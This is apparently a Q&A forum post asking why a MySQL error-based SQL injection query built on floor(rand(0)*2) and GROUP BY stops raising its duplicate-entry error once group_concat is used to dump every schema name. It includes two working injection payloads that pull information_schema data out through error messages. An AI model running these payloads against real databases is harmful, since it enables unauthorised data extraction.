# why it does't work when i use group_concat in floor() sql error injection

Tags: mysql, sql, sql-injection

When I try to use the sql error injection of some no-echo situation,i find it works, when i use `group_concat` in my query,but it should be a error so that i can get the error information.

The correct usage is:

```
select count(*),
       concat(
          (SELECT schema_name FROM information_schema.schemata limit 0,1)
          ,  
          floor(rand(0)*2) 
       ) x 
from information_schema.tables 
group by x
```

It returns :

> Duplicate entry 'information schema' for key 'group key

But I want to query all at one time. So i use:

```
select count(*),
       concat(
         (SELECT group_concat(schema_name) FROM information_schema.schemata)
         ,  
         floor(rand(0)*2) 
       ) x 
from information_schema.tables 
group by x
```

but it doesn't return error.
[enter image description here](https://i.stack.imgur.com/S8rMK.png)
So why? I am grateful for your help

Comment: Post some sample data with expected output.

Comment: Welcome to SO! In its current state, it's hard to tell what your *exact* question is. Please [edit] your question and add a tag for the RDBMS you're using, sample input and expected output.
Apart from that: This doesn't look like a question about SQL injection. What exactly are you trying to achieve?

Comment: Interesting question.  You are saying that an aggregation query is allowed for a `group by` key, but a non-aggregation query is not.  I am surprised that it is allowed.

Comment: because the floor(rand(0)*2)  can be 0 or 1,it is a useful tool in blind sql  injection